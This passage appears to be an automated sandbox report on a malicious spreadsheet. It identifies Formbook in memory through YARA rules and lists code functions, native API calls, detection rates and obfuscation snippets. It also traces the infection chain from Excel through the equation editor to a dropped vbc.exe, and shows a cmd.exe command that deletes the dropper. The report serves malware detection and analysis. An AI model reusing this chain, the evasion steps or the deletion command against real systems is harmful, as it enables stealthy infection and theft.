Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Contains functionality to shutdown / reboot the system
Source: C:\Users\Public\vbc.exe Code function: 4_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 4_2_004030FB
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_004047D3 4_2_004047D3
Source: C:\Users\Public\vbc.exe Code function: 4_2_004061D4 4_2_004061D4
Source: C:\Users\Public\vbc.exe Code function: 4_2_10008836 4_2_10008836
Source: C:\Users\Public\vbc.exe Code function: 4_2_10003D10 4_2_10003D10
Source: C:\Users\Public\vbc.exe Code function: 4_2_100110E1 4_2_100110E1
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000F902 4_2_1000F902
Source: C:\Users\Public\vbc.exe Code function: 4_2_100119AC 4_2_100119AC
Source: C:\Users\Public\vbc.exe Code function: 4_2_100059B1 4_2_100059B1
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001AA24 4_2_1001AA24
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001AA33 4_2_1001AA33
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000B23E 4_2_1000B23E
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000FE74 4_2_1000FE74
Source: C:\Users\Public\vbc.exe Code function: 4_2_10005EA5 4_2_10005EA5
Source: C:\Users\Public\vbc.exe Code function: 4_2_100062BD 4_2_100062BD
Source: C:\Users\Public\vbc.exe Code function: 4_2_100066F2 4_2_100066F2
Source: C:\Users\Public\vbc.exe Code function: 4_2_10006B27 4_2_10006B27
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000F390 4_2_1000F390
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401026 5_2_00401026
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401028 5_2_00401028
Source: C:\Users\Public\vbc.exe Code function: 5_2_00401030 5_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B893 5_2_0041B893
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B896 5_2_0041B896
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C963 5_2_0041C963
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041D1F8 5_2_0041D1F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_00408C70 5_2_00408C70
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D87 5_2_00402D87
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402D90 5_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041BF0D 5_2_0041BF0D
Source: C:\Users\Public\vbc.exe Code function: 5_2_00402FB0 5_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091E0C6 5_2_0091E0C6
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094D005 5_2_0094D005
Source: C:\Users\Public\vbc.exe Code function: 5_2_0093905A 5_2_0093905A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00923040 5_2_00923040
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091E2E9 5_2_0091E2E9
Source: C:\Users\Public\vbc.exe Code function: 5_2_009C1238 5_2_009C1238
Source: C:\Users\Public\vbc.exe Code function: 5_2_009463DB 5_2_009463DB
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091F3CF 5_2_0091F3CF
Source: C:\Users\Public\vbc.exe Code function: 5_2_00922305 5_2_00922305
Source: C:\Users\Public\vbc.exe Code function: 5_2_00927353 5_2_00927353
Source: C:\Users\Public\vbc.exe Code function: 5_2_0096A37B 5_2_0096A37B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00955485 5_2_00955485
Source: C:\Users\Public\vbc.exe Code function: 5_2_00931489 5_2_00931489
Source: C:\Users\Public\vbc.exe Code function: 5_2_0095D47D 5_2_0095D47D
Source: C:\Users\Public\vbc.exe Code function: 5_2_0093C5F0 5_2_0093C5F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092351F 5_2_0092351F
Source: C:\Users\Public\vbc.exe Code function: 5_2_00924680 5_2_00924680
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092E6C1 5_2_0092E6C1
Source: C:\Users\Public\vbc.exe Code function: 5_2_009C2622 5_2_009C2622
Source: C:\Users\Public\vbc.exe Code function: 5_2_009A579A 5_2_009A579A
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092C7BC 5_2_0092C7BC
Source: C:\Users\Public\vbc.exe Code function: 5_2_009557C3 5_2_009557C3
Source: C:\Users\Public\vbc.exe Code function: 5_2_009BF8EE 5_2_009BF8EE
Source: C:\Users\Public\vbc.exe Code function: 5_2_0092C85C 5_2_0092C85C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0094286D 5_2_0094286D
Source: C:\Users\Public\vbc.exe Code function: 5_2_009C098E 5_2_009C098E
Source: C:\Users\Public\vbc.exe Code function: 5_2_009229B2 5_2_009229B2
Source: C:\Users\Public\vbc.exe Code function: 5_2_009369FE 5_2_009369FE
Source: C:\Users\Public\vbc.exe Code function: 5_2_009A5955 5_2_009A5955
Source: C:\Users\Public\vbc.exe Code function: 5_2_009D3A83 5_2_009D3A83
Source: C:\Users\Public\vbc.exe Code function: 5_2_009CCBA4 5_2_009CCBA4
Source: C:\Users\Public\vbc.exe Code function: 5_2_009ADBDA 5_2_009ADBDA
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091FBD7 5_2_0091FBD7
Source: C:\Users\Public\vbc.exe Code function: 5_2_00947B00 5_2_00947B00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C7E0C6 8_2_00C7E0C6
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C83040 8_2_00C83040
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9905A 8_2_00C9905A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CAD005 8_2_00CAD005
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C7E2E9 8_2_00C7E2E9
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D21238 8_2_00D21238
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C7F3CF 8_2_00C7F3CF
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA63DB 8_2_00CA63DB
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C87353 8_2_00C87353
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CCA37B 8_2_00CCA37B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C82305 8_2_00C82305
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C91489 8_2_00C91489
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CB5485 8_2_00CB5485
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9C5F0 8_2_00C9C5F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8351F 8_2_00C8351F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8E6C1 8_2_00C8E6C1
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C84680 8_2_00C84680
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D22622 8_2_00D22622
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D0579A 8_2_00D0579A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8C7BC 8_2_00C8C7BC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D1F8EE 8_2_00D1F8EE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8C85C 8_2_00C8C85C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA286D 8_2_00CA286D
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C969FE 8_2_00C969FE
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D2098E 8_2_00D2098E
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C829B2 8_2_00C829B2
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D05955 8_2_00D05955
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D33A83 8_2_00D33A83
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D0DBDA 8_2_00D0DBDA
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C7FBD7 8_2_00C7FBD7
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D2CBA4 8_2_00D2CBA4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CA7B00 8_2_00CA7B00
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00D1FDDD 8_2_00D1FDDD
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C8CD5B 8_2_00C8CD5B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00CB0D3B 8_2_00CB0D3B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C9EE4C 8_2_00C9EE4C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C90F3F 8_2_00C90F3F
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009B893 8_2_0009B893
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009B896 8_2_0009B896
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009C963 8_2_0009C963
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009D1E5 8_2_0009D1E5
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00088C70 8_2_00088C70
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00082D87 8_2_00082D87
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00082D90 8_2_00082D90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00082FB0 8_2_00082FB0
Found potential string decryption / allocating functions
Source: C:\Users\Public\vbc.exe Code function: String function: 0091DF5C appears 89 times
Source: C:\Users\Public\vbc.exe Code function: String function: 00963F92 appears 73 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0091E2A8 appears 32 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0098F970 appears 71 times
Source: C:\Users\Public\vbc.exe Code function: String function: 0096373B appears 185 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00C7E2A8 appears 38 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00CEF970 appears 77 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00CC3F92 appears 99 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00CC373B appears 237 times
Source: C:\Windows\SysWOW64\netsh.exe Code function: String function: 00C7DF5C appears 101 times
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 5_2_004185B0 NtCreateFile, 5_2_004185B0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418660 NtReadFile, 5_2_00418660
Source: C:\Users\Public\vbc.exe Code function: 5_2_004186E0 NtClose, 5_2_004186E0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00418790 NtAllocateVirtualMemory, 5_2_00418790
Source: C:\Users\Public\vbc.exe Code function: 5_2_009100C4 NtCreateFile,LdrInitializeThunk, 5_2_009100C4
Source: C:\Users\Public\vbc.exe Code function: 5_2_00910048 NtProtectVirtualMemory,LdrInitializeThunk, 5_2_00910048
Source: C:\Users\Public\vbc.exe Code function: 5_2_00910078 NtResumeThread,LdrInitializeThunk, 5_2_00910078
Source: C:\Users\Public\vbc.exe Code function: 5_2_009107AC NtCreateMutant,LdrInitializeThunk, 5_2_009107AC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090F9F0 NtClose,LdrInitializeThunk, 5_2_0090F9F0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090F900 NtReadFile,LdrInitializeThunk, 5_2_0090F900
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 5_2_0090FAD0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FAE8 NtQueryInformationProcess,LdrInitializeThunk, 5_2_0090FAE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FBB8 NtQueryInformationToken,LdrInitializeThunk, 5_2_0090FBB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FB68 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_0090FB68
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FC90 NtUnmapViewOfSection,LdrInitializeThunk, 5_2_0090FC90
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FC60 NtMapViewOfSection,LdrInitializeThunk, 5_2_0090FC60
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FD8C NtDelayExecution,LdrInitializeThunk, 5_2_0090FD8C
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FDC0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_0090FDC0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FEA0 NtReadVirtualMemory,LdrInitializeThunk, 5_2_0090FEA0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 5_2_0090FED0
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FFB4 NtCreateSection,LdrInitializeThunk, 5_2_0090FFB4
Source: C:\Users\Public\vbc.exe Code function: 5_2_009110D0 NtOpenProcessToken, 5_2_009110D0
Source: C:\Users\Public\vbc.exe Code function: 5_2_00910060 NtQuerySection, 5_2_00910060
Source: C:\Users\Public\vbc.exe Code function: 5_2_009101D4 NtSetValueKey, 5_2_009101D4
Source: C:\Users\Public\vbc.exe Code function: 5_2_0091010C NtOpenDirectoryObject, 5_2_0091010C
Source: C:\Users\Public\vbc.exe Code function: 5_2_00911148 NtOpenThread, 5_2_00911148
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090F8CC NtWaitForSingleObject, 5_2_0090F8CC
Source: C:\Users\Public\vbc.exe Code function: 5_2_00911930 NtSetContextThread, 5_2_00911930
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090F938 NtWriteFile, 5_2_0090F938
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FAB8 NtQueryValueKey, 5_2_0090FAB8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FA20 NtQueryInformationFile, 5_2_0090FA20
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FA50 NtEnumerateValueKey, 5_2_0090FA50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FBE8 NtQueryVirtualMemory, 5_2_0090FBE8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FB50 NtCreateKey, 5_2_0090FB50
Source: C:\Users\Public\vbc.exe Code function: 5_2_0090FC30 NtOpenProcess, 5_2_0090FC30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C700C4 NtCreateFile,LdrInitializeThunk, 8_2_00C700C4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C707AC NtCreateMutant,LdrInitializeThunk, 8_2_00C707AC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6F9F0 NtClose,LdrInitializeThunk, 8_2_00C6F9F0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6F900 NtReadFile,LdrInitializeThunk, 8_2_00C6F900
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FAE8 NtQueryInformationProcess,LdrInitializeThunk, 8_2_00C6FAE8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FBB8 NtQueryInformationToken,LdrInitializeThunk, 8_2_00C6FBB8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FB50 NtCreateKey,LdrInitializeThunk, 8_2_00C6FB50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FB68 NtFreeVirtualMemory,LdrInitializeThunk, 8_2_00C6FB68
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FC60 NtMapViewOfSection,LdrInitializeThunk, 8_2_00C6FC60
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FDC0 NtQuerySystemInformation,LdrInitializeThunk, 8_2_00C6FDC0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FD8C NtDelayExecution,LdrInitializeThunk, 8_2_00C6FD8C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 8_2_00C6FED0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FFB4 NtCreateSection,LdrInitializeThunk, 8_2_00C6FFB4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C710D0 NtOpenProcessToken, 8_2_00C710D0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C70048 NtProtectVirtualMemory, 8_2_00C70048
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C70060 NtQuerySection, 8_2_00C70060
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C70078 NtResumeThread, 8_2_00C70078
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C701D4 NtSetValueKey, 8_2_00C701D4
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C71148 NtOpenThread, 8_2_00C71148
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C7010C NtOpenDirectoryObject, 8_2_00C7010C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6F8CC NtWaitForSingleObject, 8_2_00C6F8CC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C71930 NtSetContextThread, 8_2_00C71930
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6F938 NtWriteFile, 8_2_00C6F938
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FAD0 NtAllocateVirtualMemory, 8_2_00C6FAD0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FAB8 NtQueryValueKey, 8_2_00C6FAB8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FA50 NtEnumerateValueKey, 8_2_00C6FA50
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FA20 NtQueryInformationFile, 8_2_00C6FA20
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FBE8 NtQueryVirtualMemory, 8_2_00C6FBE8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FC90 NtUnmapViewOfSection, 8_2_00C6FC90
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C70C40 NtGetContextThread, 8_2_00C70C40
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FC48 NtSetInformationFile, 8_2_00C6FC48
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FC30 NtOpenProcess, 8_2_00C6FC30
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C71D80 NtSuspendThread, 8_2_00C71D80
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FD5C NtEnumerateKey, 8_2_00C6FD5C
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FEA0 NtReadVirtualMemory, 8_2_00C6FEA0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FE24 NtWriteVirtualMemory, 8_2_00C6FE24
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FFFC NtCreateProcessEx, 8_2_00C6FFFC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C6FF34 NtQueueApcThread, 8_2_00C6FF34
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_000985B0 NtCreateFile, 8_2_000985B0
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00098660 NtReadFile, 8_2_00098660
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_000986E0 NtClose, 8_2_000986E0
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe 2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
Source: Joe Sandbox View Dropped File: C:\Users\Public\vbc.exe 2FFBB436257F6F348FADE42E94DF5737AB8B9D9848A220206992C52D917A7B5E
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: Sajeeb09908976745344567.xlsx Virustotal: Detection: 29%
Source: Sajeeb09908976745344567.xlsx ReversingLabs: Detection: 21%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Sajeeb09908976745344567.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVRC30.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/15@2/2
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402053 CoCreateInstance,MultiByteToWideChar, 4_2_00402053
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA, 4_2_00404292
Source: explorer.exe, 00000006.00000000.542838548.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: netsh.pdb source: vbc.exe, 00000005.00000002.556406324.0000000000553000.00000004.00000020.sdmp
Source: Binary string: wntdll.pdb source: vbc.exe, netsh.exe

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\Public\vbc.exe Unpacked PE file: 5.2.vbc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000A505 push ecx; ret 4_2_1000A518
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B85C push eax; ret 5_2_0041B862
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041C932 pushfd ; ret 5_2_0041C933
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041525A pushfd ; ret 5_2_0041525B
Source: C:\Users\Public\vbc.exe Code function: 5_2_00416235 push 1D9B51BBh; retf 5_2_0041623A
Source: C:\Users\Public\vbc.exe Code function: 5_2_00415C87 push cs; iretd 5_2_00415C88
Source: C:\Users\Public\vbc.exe Code function: 5_2_0040AEB2 push ebp; retf 5_2_0040AEBC
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7F2 push eax; ret 5_2_0041B7F8
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7FB push eax; ret 5_2_0041B862
Source: C:\Users\Public\vbc.exe Code function: 5_2_0041B7A5 push eax; ret 5_2_0041B7F8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C7DFA1 push ecx; ret 8_2_00C7DFB4
